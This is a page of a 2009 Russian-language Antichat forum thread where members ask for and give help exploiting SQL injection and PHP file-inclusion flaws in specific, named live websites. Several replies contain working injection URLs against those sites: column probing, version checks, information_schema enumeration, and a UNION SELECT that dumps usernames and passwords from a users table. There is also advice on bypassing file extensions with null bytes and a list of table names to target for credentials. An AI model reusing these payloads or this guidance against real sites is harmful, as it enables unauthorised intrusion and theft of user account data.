Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 381 of 1207
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.mieszkania.inter-bud.pl/m-os.php?id=115
    PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи :)
    Code:
    http://www.gambitlive.com/night.php?id=90
    MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?
     
    #7601 mailbrush, 16 Jun 2009
    Last edited: 16 Jun 2009
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
    SIPT,NetDeviLz SQL Scanner не катят))
     
    #7602 jecka3000, 16 Jun 2009
  3. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Архивчик битый в этой теме, перезалейте плиз.
     
    #7603 farpost, 16 Jun 2009
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134

    можно, вот:
     
    #7604 $n@ke, 16 Jun 2009
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    никак не могу подобрать столбцы, хотя на лицо, что это обычная MySQL inj
    http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619
    подскажите плиз))
     
    #7605 jecka3000, 16 Jun 2009
  6. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+order+by+4/*

    4-ый мускул
    http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+substring(version(),1,1)=4

    p.s. раскручивайте её как слепую, имхо.
     
    #7606 AlexSatter, 16 Jun 2009
    Last edited: 16 Jun 2009
  7. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    PHP:
    if (!IsSet($t)&!IsSet($f))
        {
            $f="main";
            $filename=$f ".php";
        }
        else
            {
            if (IsSet(    $t)&!IsSet($f))
                {
                    $filename=$t "/index.php";
                }
            if (IsSet(    $t)&IsSet($f))
                {
                    $filename$t "/" $f ".php";
                }
            if (!IsSet(    $t)&IsSet($f))
                {
                    $filename=$f ".php";
                }
    }
    if (    file_exists("$filename"))
    { include(    "$filename"); }
    else
    { echo     " <div class=\"alert\">  404,   . </div>"; }
            
    Можно ли в такое инъекцию провести и как?
     
    #7607 Byrger, 16 Jun 2009
  8. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    насколько позволяет моя квалификация... в этом коде возможна php-inj
    защиты тут в общем-то никакой нет.

    расширение отбрасывайте с помощью null-byte либо с помощью усечения...
     
    #7608 AlexSatter, 16 Jun 2009
    Last edited: 16 Jun 2009
  9. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Byrger
    ты же уже задавал этот вопрос, не доходчиво объяснили?
    https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40
     
    #7609 Iceangel_, 16 Jun 2009
  10. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Подзапросами, которых в этой версии нету?

    Попробуй покрутить скуль в другом месте.
     
    #7610 R1dex, 16 Jun 2009
    Last edited: 16 Jun 2009
    1 person likes this.
  11. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Не проходит я же написал помойму
     
    #7611 Byrger, 16 Jun 2009
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    подскажите плиз как дораскрутить....4* всегда вызывает у меня проблемы..., если можно, то с небольшими разъяснениями( Ососбенно как подобрать имена таблиц и колонок) вот до чего дошел я(до принтаьельной колонке):

    http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,5,6,7--
     
    #7612 jecka3000, 16 Jun 2009
  13. Adm1n4eG

    Adm1n4eG Member

    Joined:
    27 Mar 2009
    Messages:
    24
    Likes Received:
    13
    Reputations:
    6
    http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,concat_ws(char(58),username,password),6,7+from+users--

    дальше сам подбирай другие колонки и таблици...
     
    #7613 Adm1n4eG, 16 Jun 2009
    Last edited: 16 Jun 2009
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    ttp://times.ua/search/results/?keyword=1'
    Это инъекция?
     
    #7614 mailbrush, 16 Jun 2009
    1 person likes this.
  15. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Acunetix Web Vulnerability Scanner 6.x, Core Impact 7.5
    Мошнее я не видел еще
     
    #7615 YuNi|[c, 16 Jun 2009
  16. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Да

    Code:
    http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+from+information_schema.tables--+
    5 ветка и вывод очень удобный, вся инфа сразу на одной странице.
     
    #7616 Ded MustD!e, 16 Jun 2009
    Last edited: 16 Jun 2009
  17. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    jecka3000
    в 4-х скулях подбор таблиц и колонок происходит подбором. Здесь это написано
    https://forum.antichat.ru/threadnav43966-1-10.html

    для автоматизации (брутфорс таблиц,колонок из словоря), можно использоваться SIPT4
    что касается таблиц, в первую очередь следует проверять такие как: user, users,admin,admins,member,members,accounts,profiles,etc (если конечно, Вас интересуют эти данные ;) )
     
    #7617 AlexSatter, 17 Jun 2009
    Last edited: 17 Jun 2009
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Спасибо. Я пробовал подставлять так - http://times.ua/search/results/?keyword=1'/*, т.е. отсечь все лишнее, но ошибка выводилась, поэтому и не подбирал.
     
    #7618 mailbrush, 17 Jun 2009
  19. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Хочу понять как искать логи апача через
    К примеру
    Pid: 14786 - но при каждом обновлении страницы он меняется.

    Выдаёт что такого файла нет (%{FD_ID} - пробовал менять).

    Напишите эксплуатацию этой техники поподробней, пожалуйста
     
    #7619 farpost, 17 Jun 2009
  20. Adm1n4eG

    Adm1n4eG Member

    Joined:
    27 Mar 2009
    Messages:
    24
    Likes Received:
    13
    Reputations:
    6
    просто и "/*" и "--" знаки начала комментария )
     
    #7620 Adm1n4eG, 17 Jun 2009
(You must log in or sign up to post here.)
Page 381 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.